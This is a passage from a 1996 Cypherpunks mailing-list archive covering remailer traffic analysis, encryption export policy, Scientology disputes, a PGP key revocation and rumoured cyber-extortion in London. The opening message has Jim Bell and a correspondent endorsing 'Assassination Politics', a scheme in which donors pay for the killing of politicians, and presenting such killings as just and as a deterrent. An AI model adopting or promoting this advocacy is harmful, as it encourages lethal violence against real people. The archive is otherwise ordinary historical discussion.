stages of a new idea"  which starts out "It'll never work"  and ends up, "I 
knew it would work all along!"

>I do not
>reject Jim Bell's violent views for the simple reason that violence
>is often required to fight violence.  In other words, the best you
>can hope for is "... but his violent views were rejected by some
>members of the group."

I'd like to know what they mean by using the term "rejected."  A rejection 
without an alternative is irresponsible.  Assuming they agree that the 
status quo is unacceptable, and if they believe that change is possible, 
then what is their solution?

Moreover, what is the real meaning of the word "rejected" in this context?  
You can't "reject" gravity, or a hurricane, or eventual death.  


>> It is important that the reporter manages to _not_ use the word
>> "member" to indicate that Bell is a "member" of Cypherpunks.
>
>He *is* a member. And why shouldn't he be?  Are you suggesting that
>this group become moderated? (hiss).  The whole AP concept is very
>relevent to the Cypherpunks, whether the majority like it or not.

In fact, I'd argue that it's inextricably linked to good encryption.  
Defending one will ultimately defend the other.


>If your fear is that reporters will get hold of the wrong end of the
>stick, then perhaps you are correct, but the real problem is the
>*reporters*, not the attitude of the Cypherpunks.  blame them.
>propose a solution. (how about abolition of all libel laws?)

Now _that's_ an excellent idea!  Libel laws never protect the 
anti-establishment, non-mainstream portion of the public, for one.


>> This is assuming that the statement "his violent views were
>> rejected by the members of the group" is actually true!  If
>> there _is_ anyone else here who shares Bell's evil enthusiasms,
>> I strongly encourage you to begin a new list dedicated to that
>> topic.
>
>I disagree with the phrase "evil enthusiasms."  Bell is not an
>evil man.  A little crazy perhaps, but not evil.

Thanks...uh...I think...


>  If you bothered
>to listen to him, you would find that his aim is to create a
>"better" world, where people (especially politicians) are very
>much more responsible for their own actions.  He suggests that
>the number of deaths due to AP will be less that the number of
>deaths due to the current corrupt system.

True.  And it's not just the quantity of deaths that'll be lowered:  The 
"quality" of those deaths (the justification for killing the target) will go 
up, which may seem to be an odd way to refer to it.  Most of us will agree 
that if there was some way to swap the death of the victim, automatically, 
for the death of the criminal or attacker, that would be far more just 
arrangement, as well as rather rapidly deterring future killings.  

An example of the exact opposite is frequently exposed in discussing 
anti-gun-carry laws, which only disarm law-abiding citizens and leave the 
criminals armed.  Such laws, therefore, actually swap the death of the 
criminal for the death of the victim.


>think about it.  how many on this group would have another man
>killed for his views?  For his noisy stereo?  For a competive
>advantage in business?  I am confident the answer will be zero.

Moreover, the number of people wanting to kill the "unjustified" target will 
be extremely low, meaning that one odd donor would have to pay a large 
amount of money to get "action" on his donation.



>On the other hand, I would gladly throw in a few dollars to have
>certain politicians killed.  gladly.  and I will be able to sleep
>at night.

You and a few million other people.  Which is why AP will work so well 
getting rid of governments...and criminals.

>I will sleep better knowing that, although I was
>partly responsible for a mans death, I will have saved countless
>others (a bit like dropping an a-bomb on Japan).

That's exactly correct.  But also, the very existence of such a system will 
_deter_ such people, meaning that it is very likely you won't have to pay 
for anybody's death at all...except for a few that resignation won't save.


>Question for Jim - would you resort to AP to have Bryce popped off?

Nope.  Not when there are so many other deserving targets!    B^)


>Question for Bryce - would you resort to AP to have Jim popped off?

It wouldn't do any good...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 11 Jun 1996 13:06:06 +0800
To: cypherpunks@toad.com
Subject: PGP key revocation
Message-ID: <Pine.GUL.3.93.960610121323.21861C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


If you exchanged private email with me in the last 18 months, encrypted or
not, in either direction, you should assume that it has been read. 

If you want to contact me, please use my alpha pager, rich@beep.stanford.edu
(60 characters in the Subject: line) or leave a message at 415-725-7710 and
I will call you back. 

My backup key 0x6992AB4D is probably still secure, but I'm going to generate
a new one as soon as I find the time to build a clean machine. 

Thank you for playing. 

-rich

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

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
qbEJ/76Gfgzv/W6pP3MJVrcDesU7/qQ4aSdPAIP7Ac7RXySMMsrdiRQXFKDHW4I4
78aF1A2HjvlMcrdNR+aldaHkyc+ffv3Z0Y1v3ov+GQM9V2KHdtMXOE3e8PlEg5xF
iOfwWTpihvCMXeM0P+8t+rGJAJUDBRAxOM6P5PUudM+LRA0BAciKA/0bts6s+xKW
eqUMdUjnLclC+Zi50OKhS8LuS8RKLSmo5885eiSMqAaOQYjV924EPBmfsNhWsS3G
51jSxGHj8E/2b3rjsUWOW+O5Lq7DM8W4b0IuQkFINEwgfZ6T5MUc1iPQtYo8l/7W
vR3lAhLFQRmnQgGr8at+ekNumeckasFeALQsUmljaCBFbmNyeXB0ZWQgRHJvcGJv
eCA8bGx1cmNoQGFscGhhLmMyLm9yZz60QEZvciBndWFyYW50ZWVkIHNlY3VyaXR5
LCB1c2UgMHg2OTkyQUI0RCBmb3IgcmljaC5ncmF2ZXNAZm9yc3l0aGW0KlIuIENo
YXJsZXMgR3JhdmVzIDxyY2dyYXZlc0BpeC5uZXRjb20uY29tPrQkUmljaCBHcmF2
ZXMgPGFuMjc0MDc0QGFub24ucGVuZXQuZmk+tBdKdXN0IFJpY2ggPHJpY2hAYzIu
b3JnPg==
=aVAl
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Tue, 11 Jun 1996 09:52:16 +0800
To: cypherpunks@toad.com
Subject: Re: Anti-Scientologists
Message-ID: <2.2.32.19960610194210.009e3afc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:37 PM 6/10/96 +0200, someone wrote:
[snip]
>Declan wrote:
>
>> Truth #2: Cults can exist in the absence of a charismatic leader.
>
>Would you describe Christianity as a cult?  If not, why not?

So we're going to argue about whether the word "cult" should apply
to CoS??  Okay, how about this: it's a _religion_ that uses
deception, mind control techniques, and criminal activities to
attempt to get as much possible money from as many marks^H^H^H^H^H
worshippers as possible, and goes to extreme lengths to silence
its critics.

Is that better?

Hubbard started CoS because he was getting too much heat over the
quackery and pseudoscience in "Dianetics."

I'm going to start a religion, too, called the Church of the Shell
Game.  Don't you call it a cult, or I'll be real mad!


Rich



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMbx6cYT0GKfZRA/9AQFUTwP+ODigyynDs76o039u/SgxP5K54LSOjsh+
AoKWi81U/cHwPABNZ+fhoP+Hcpd21m4mycWRcFoMwW/VC1xfuEYaCRrqhUlJy5oe
EMYlHNbZQ/klZPBnZkfBZSJFApWpeZTfsaAPKnzwtEGJVTGd0GtdnUe8X2mfCJHJ
Hc5gmTmyQvA=
=RZOB
-----END PGP SIGNATURE-----
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Dommett <steve.dommett@ukimage.demon.co.uk>
Date: Tue, 11 Jun 1996 09:16:09 +0800
To: cypherpunks@toad.com
Subject: send info
Message-ID: <960610125009@ukimage.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain





--
  _  ______      _      _____  _____
 | ||  ___ \    \ \    / ____||_____|  * Consulting * Designing * Publishing *
 | || | _ | |   _\ \  | /  __  _____      Chairman & President Andrew Lobel
 | || || || |  / /\ \ | | |__||  ___|
 | || || || | / /__\ \\ \____|| |___     Visit http://www.mirage.co.uk/image/
 |_||_||_|| |/________\\_____/|_____|
                                        Tel: 0956 82 8157   Fax: 0181 959 6094
   E  N  T  E  R  P  R  I  S  E  S       (National Rate)    BBS: 0181 959 8868





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 11 Jun 1996 02:46:11 +0800
To: cypherpunks@toad.com
Subject: TWP on Crypto Policy
Message-ID: <199606101259.MAA01702@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, June 10, 1996, p. A18. 
 
 
   Global Village Cops? 
 
 
   What will be the long-term effect of Internet technologies 
   on global law enforcement? The amazing story of Bill and 
   Anna Young, a k a Leslie Rogge and Judy Kay Wilson, offers 
   one possible scenario. The pseudonymous Youngs, residents 
   of Guatemala who the FBI says have been on a decade-long 
   run from U.S. justice since Mr. Rogge was convicted of a 
   string of bank robberies and other offenses, turned 
   themselves in to authorities after a neighbor recognized 
   Mr. Rogge's face on the FBI home page's Most Wanted list. 
   According to a story first told in the Guatemala Weekly, 
   the person who recognized him was a newly Internet-wired 
   14-year-old. 
 
   The vision of the future evoked by this story, of a world 
   in which the familiar "global village" becomes a place not 
   just of instant communication but of neighborly nosiness 
   and where no one can just melt into the crowd, is 
   reassuring and unnerving in about equal proportions. (What 
   if it were a network of hit men or an authoritarian 
   government seeking a dissident, rather than the FBI, making 
   use of this powerful technology?) But it's also worth 
   keeping in mind that, other than the romance of the 
   technology, it doesn't represent that great an advance on 
   current global media that have made celebrities or 
   fugitives' faces familiar to a vast public -- just ask 
   Salman Rushdie. The Rogge nabbing is the first that the FBI 
   credits to its home page specifically, but TV's "America's 
   Most Wanted" has scored similar coups. 
 
   The impossibility of predicting the exact shape of these 
   extensions of policing is relevant as well to a report that 
   the National Research Council recently issued on another 
   computer technology issue -- the vexed matter of whether to 
   ease export controls on encryption software, which encodes 
   information sent electronically so that only a user with a 
   key can decipher it. 
 
   The government until now has resisted lifting controls on 
   "uncrackable" encryption software --  that is, codes that 
   are too complex to be broken by brute force -- unless the 
   industry agrees to deposit keys in an escrow arrangement 
   with a third party so the government can seek and obtain a 
   warrant to read encoded communications if necessary. 
   Software makers, meanwhile, are pushing hard to have these 
   restrictions eased. The research council, an arm of the 
   generally neutral National Academy of Sciences, sought to 
   bridge the gap between industry interests and such 
   government agencies as the FBI and national security 
   agencies, whose case, they say, is based largely on 
   classified matter that can't be publicly discussed. 
 
   Part of the report's conclusion, which favors the easing 
   though not the abolition of current restrictions, is that 
   wider use of encryption technology will actually *help* 
   national security and law enforcement because more data, 
   economic and otherwise, will be secure to begin with. But 
   if the news of the changing terrain tells anything, it is 
   that it is far too soon to base arguments on such a 
   premise. Our own sense on encryption is that the national 
   security and law enforcement questions remain too important 
   to be sacrificed lightly, despite the considerable economic 
   interests of the parties on the other side. But the world 
   of Internet law enforcement is still taking shape. Whatever 
   the public conclusion on encryption, the debate should not 
   rest on any assumptions about what that shape will be. 
 
   -- 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 11 Jun 1996 11:45:14 +0800
To: cypherpunks@toad.com
Subject: HACK - Class III Information Warfare, Has It Begun?  (fwd)
Message-ID: <Pine.GUL.3.93.960610130553.22853C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Yes, I recently subscribed to Netly-L. What of it?

Any bets on whether the Sunday Times is going to sue Time for this blatant
copyright violation? :-)

-rich

---------- Forwarded message ----------
Date: Mon, 10 Jun 1996 12:17:41 -0400
From: Noah Robischon <noah@pathfinder.com>
Reply-To: netly-l@pathfinder.com
To: Multiple recipients of list <netly-l@relay.pathfinder.com>
Subject: HACK - Class III Information Warfare, Has It Begun? 

Well this update from The Sunday Times of London clarifies just how much
last week's story was based on rumor. The answer: totally.  (Esp. note the
quote in paragraph #5).

From:
http://www.sunday-times.co.uk/news/pages/Sunday-Times/stinwenws01027.html?12
55993

Secret DTI inquiry into cyberterror

 THE government has been holding a secret investigation into attacks by
 "cyber terrorists" on the City of London for more than two years. The
Department of Trade and Industry (DTI), Bank of England, GCHQ, the
 secret listening station, and the Defence Research Agency (DRA) are
 involved in the inquiry.

The existence of the investigation, which began in April 1994, emerged
 after The Sunday Times revealed last week that banks, broking firms and
investment houses had paid millions of pounds to gangs that threaten to
wipe out computer systems.

 Correspondence from the investigating authorities, seen by Insight,
include letters from civil servants saying they are "extremely concerned"
 at the evidence of extortion demands.

Yesterday the DTI issued a statement confirming the inquiry and
 suggesting its work had been hampered by the lack of co-operation from
 City institutions.

"We are very interested in the allegations of extortion directed at City of
 London institutions which were brought to our attention in 1994. We
 responded then by involving many government organisations, including
 the DTI, the police, the Bank of England and other agencies. So far, we
have not been presented with any hard evidence from victims.We would
 urge those threatened to come forward," a spokesman said.

 In one letter, dated May 1995, David Hendon, director of DTI technical
affairs, wrote to a company specialising in computer security work
stating that he was taking the City extortion issue "extremely seriously".
Insight has since seen the evidence passed to the DTI and GCHQ which
sparked the investigation. In 1994, a consultant working for a company
which undertakes computer risk assessments for City institutions
compiled a table of 46 attacks on banks and finance houses in New
York, London and other centres, starting in January 1993.

 The list included details of raids on three British banks and one American
investment house. The documents suggested that operations in the
 futures markets had been a focus for some of the attacks.

Documents sent by the DRA, from the office of Professor David Parks,
a senior director, indicate that the agency is especially interested in the
 "weaponry" deployed by the cyber terrorists.

The agency believes high-intensity radio frequency (HIRF) guns may
have been used to black out trading positions in City finance houses. The
weapon disables a computer by firing electromagnetic radiation at it and
is a "black programme" at the defence ministry, one of the highest
security classification levels.

Last December, Parks approached a company which specialises in
defensive measures against information warfare and carries out work for
 GCHQ. For a£30,000 fee it was asked to arrange a demonstration of a
portable HIRF weapon in Germany.

Details of the HIRF weaponry and its use in the City have also been
compiled by Computing magazine, which intends to pass them to the
 DTI and other authorities.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 11 Jun 1996 11:20:21 +0800
To: cypherpunks@toad.com
Subject: whitehouse queries files on political enemies
Message-ID: <199606102021.NAA01025@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



what goes around comes around..
this reminds me of the old stories of Nixon and the various NSA
domestic programs mentioned by Bamford ("Puzzle Palace")


- ------- Forwarded Message

Date: Fri, 7 Jun 1996 22:23:03 -0700 (MST)
To: fsnw-l@freespeechnews.com
From: Free Speech <ron@grapevinenews.com>
Subject: [FreeSpeech-NewsWire] Files White House Got


>From POLITICSnow I just picked up the following Associated Press story,
dated June 7, 1996:


"The Clinton White House acknowledged Friday it
sought and received more than 300 FBI files,
including those of House Speaker Newt Gingrich's
press secretary, former Bush chief of staff James A.
Baker III and other prominent Republicans."
- - -- Associated Press=20

Also, in POLITICSnow is another press story which states, "Blankley, Baker,
Fitzwater Among 330 FBI
Files White House Got". The following is from that story:

Friday, June 7, 1996=20
=A9 The Associated Press=20

"WASHINGTON (AP) - The Clinton White House acknowledged
Friday it sought and received more than 300 FBI files, including those of
House Speaker Newt Gingrich's press secretary, former Bush chief of
staff James A. Baker III and other prominent Republicans.=20

Republicans immediately denounced the White House, saying President
Clinton's aides misused the FBI to get information on political enemies.
A top GOP leader suggested hearings were in order.=20

White House spokesman Mark Fabiani called it "an innocent
bureaucratic mistake" and said there was no indication anyone reviewed
the FBI background material.=20

But among the unanswered questions were who at the White House
knew the files had been gathered and why they were kept at the White
House rather than returned to the FBI after the error was discovered by
a low-level White House employee sometime early in 1994.=20

The files - some 330 in all, almost all of them former employees of
Republican administrations - were stored in the White House security
office's vault in late 1993 and early 1994, the White House said."

My comments:

I have heard posters say, "So what, I'm alive. I have a job. Why should I
care about this Whitwater
stuff?"

I, myself, have defended President Clinton in POLITICSnow when they were
known as PoliticsUSA. I
have held firm that there is no evidence against the Clinton's. This still
holds true, in my opinion, with
Ron Brown, Vince Foster, etc.

I stated that Travelgate, Whitewatergate, Troopergate, etc. were much to do
about nothing. Maybe they
are in themselves. Although, I am on the verge of making a public apology in
POLITICSnow based upon
the evidence that is beginning to come forth.

For anyone who counts himself a liberal, a basic premise is to have the
government out of our personal
business unless there is an absolute need for it. What apparently has
happened is that the Whitehouse,
for purely political reasons, obtained 330 FBI files almost all of them
former employees of Republican
administrators. This violates, in my opinion, the basic principles of
liberalism. I will answer any posts in
this news forum by anyone who terms himself a liberal and at the same time
defends, what I consider,
Nazi behavior. I want to add that I have the highest respect for the FBI and
all the other Intelligence
Services of the United States. The buck stops somewhere, and it is not with
the FBI.

Best regards,


Bob Drake
snoball@mail.idt.net




- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 11 Jun 1996 10:50:24 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Multiple Remailers at a site?
In-Reply-To: <added28f0302100472cc@[206.170.115.3]>
Message-ID: <199606101858.OAA29866@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Lance Cottrell writes:
>At 12:16 PM 6/6/96, Scott Brickner wrote:
><SNIP>
>>The discussion was about multiple remailers from multiple accounts on
>>the same machine.  The very existence of the remailer, independent of
>>issues like shuffling and chaining, is supposed to eliminate
>>identifying the originator by the content of the message.  Message
>>shuffling, delays, and chaining are entirely for the purpose of
>>reducing the information available to the traffic analyst.  If several
>>remailers are running on the same machine, they may be treated as if
>>there were only one remailer, for the purpose of traffic analysis.
>>Getting more traffic going through them just makes the analysts job
>>easier, because his statistical conclusions are stronger.
>         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
>I don't think I am following you. My messages are a constant size signal (I
>send N messages through the remailer). More traffic increases the
>background signal and background noise. While the signal to noise of the
>background gets better, the actual amount of noise went up so the ratio of
>MY signal to the background noise went down. Perhaps I don't understand
>what you are saying.

The TA isn't just looking at your messages.  All traffic through the
remailer represents data.  The S/N ratio is constant whether the
machine has a single remailer or a dozen.  The total traffic through a
machine with a dozen remailers is likely to be higher, since the total
number of remailers world-wide is so small, and users are looking for
fairly random and fairly long chains.  This means that the TA's
statistical sample is a larger fraction of the population (of total
remailer traffic), so correlations identified are stronger.

>I think multiple remailers on a machine are less effective than a single
>remailer with the combined traffic of all the individual remailers, because
>the combined remailer does better reordering from a larger pool.

I agree totally.  The whole point is that multiple remailers on one
machine are a bad thing.  If it weren't for traffic analysis, we would
be happy even if there were only one remailer world-wide that we felt
was safe from subversion.  Adding more remailers to the same machine
doesn't improve protection from traffic analysis, and may slightly
weaken it (by attracting more traffic).

Therefore, multiple remailers on a single machine are a bad thing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 11 Jun 1996 12:13:28 +0800
To: cypherpunks@toad.com
Subject: Re: Kahn's "The CodeBreakers"
Message-ID: <ade1e4100c02100490cd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM 6/10/96, Brad Shantz wrote:

>For those wondering what the significance of Port Townsend is...well,
>there is none.  It is, however, the location of Fort Worden which is
>where "An Officer and a Gentleman" was filmed.  (Major piece of
>military history, isn't it?)
>

Ah, but it does have some significance. "Liberty" is published out of Port
Townsend. (More precisely, it was the last time I looked.)

And it's near Hump Tulips, Sequim, and Chimicum (sp?). Ma and Pa Kettle country.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Tue, 11 Jun 1996 12:29:24 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Gore opposes unwarranted'' Internet censorship
Message-ID: <199606101855.OAA29891@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


We should not cut the Administration slack on the basis of some
carefully spun comment by Al Gore's handlers.

We're going to win this one for ourselves.  The fact that the White House
has begun the process of backing away from their own case through ol' Al 
should not, and will not, change my mind.

If you're going to give them credit for anything, give them credit for
directing the Justice dept. to state that they were opposed to Exon's
ideas very early on in the game.  (even if that position became amazingly
low profile when faced with the certainty of the rest of the telecomm bill)

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

Mike McNally writes:
>Joseph M. Reagle Jr. wrote:
>> 
>> Sounds good but I had to laugh when I heard it... is he at odds with
>> other members of the administration, or is this rhetoric?
>
>Good cop, bad cop.
>
>______c_____________________________________________________________________
>Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
>       m5@tivoli.com * m101@io.com          *
>      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jaed@best.com (Jeanne A. E. DeVoto)
Date: Tue, 11 Jun 1996 12:14:54 +0800
To: um@c2.org (Ulf Moeller)
Subject: Re: Report from Germany on "backdoor" net-censorship
Message-ID: <v01540b00ade249ef4c82@[205.149.167.81]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 PM 6/9/96, Ulf Moeller wrote:
>Furthermore, sample news articles will be suject to detailed legal
>evaluation. Should this result in suspicion or proof of transportation
>of illegal contents, the ICTF can launch various steps to work against
>propagation of these contents. For example, it can arrange for
>blocking of complete newsgroups or retrospect "Cancel" of articles
>already transmitted.

Um. Does this ICTF understand the implications of sending forged cancel
messages outside its own server, when the cancels are based strictly on
disapproval of the content? Do they realize what the consequences will be
for carriage of traffic from their node?

Is Germany about to become known as "Cancelbunny Nation"?

>Internet Media Counsil presents fist measurements for Voluntary
>Self-Control

This is a wonderful type in the fifth word above... ;-)

--
The Internet interprets the US Congress as system damage
and routes around it.   - with apologies to John Gilmore






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 11 Jun 1996 12:35:02 +0800
To: cypherpunks@toad.com
Subject: InfoWar and a.r.s
Message-ID: <199606102213.PAA28725@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems to me we are seeing an example of Information Warfare in the
doings around alt.religion.scientology.  The board game "Go" models warfare
by having a goal of controlling territory.  In the a.r.s war, we see the
combatants trying to control the newsgroup.  We even see an arms race with
weapons such as cancelbots being developed and employed.

The major difference between newsgroup war and conventional war is that the
dimension a victor needs to control is time and not space.

One question to ponder is whether the a.r.s war will perform the same role
as the Spanish Civil War vs. WW2.  Will we see newsgroup war expand to
other news groups?  I would think a few of the .culture.* groups could be
candidates.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 11 Jun 1996 12:49:05 +0800
To: cypherpunks@toad.com
Subject: Slander of Catholic Church
Message-ID: <ade1e9960d021004dcf7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:42 PM 6/10/96, Rich Burroughs wrote:

>....  Okay, how about this: it's a _religion_ that uses
>deception, mind control techniques, and criminal activities to
>attempt to get as much possible money from as many marks^H^H^H^H^H
>worshippers as possible, and goes to extreme lengths to silence
>its critics.

I don't think this vicious criticism of the Catholic Church is warranted here!

Many of those investigated by the Holy Office actually _were_ heretics, and
the turning of bread into the holy flesh of Our Lord Jesus Christ has been
verified by Vatican scientists. Further, those peasants of Latin America
who give their earnings to the Church so that more jewel-encrusted crosses
and goblets can be bought do not see themselves as victims of a scam. After
all, the Church may get richer in this secular world as they get poorer,
but the Church promises them a seat at St. Peter's dinner table in the next
life.

As to the Church silencing its critics...surely you are not referring to
that Jew slander about the Vatican banker found hanging from Black Friar's
bridge in London? Or the Protestant myth about Opus Dei and its
dispensation of papal justice?

The Pope can utter nothing that is false when he speaks ex cathedra. You
heathens had better remember this, else you may expect an invitation from
the Sacred Congregation for the Doctrine of the Faith (which some of you
heretics and nonbelievers may know by its old name, the Sacred Congregation
of Universal Inquisition).

Millions alive today will reveal the truth before they die.

--Cardinal Timothy May

(Who believes all cults and religions are basically the same shuck and
jive, and who thinks the "Church of Scientology" is actually a little bit
less foolish that the Church of Mormon, with its "baptism of dead
ancestors" into the Church, the funny underwear people have to secretly
wear, etc. However, I have great respect for the practical tactics of the
Mormons, and no respect for the day to day behavior of the CoS.)


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herr Wendigo <wendigo@gti.net>
Date: Tue, 11 Jun 1996 10:00:55 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Anti-Scientologists
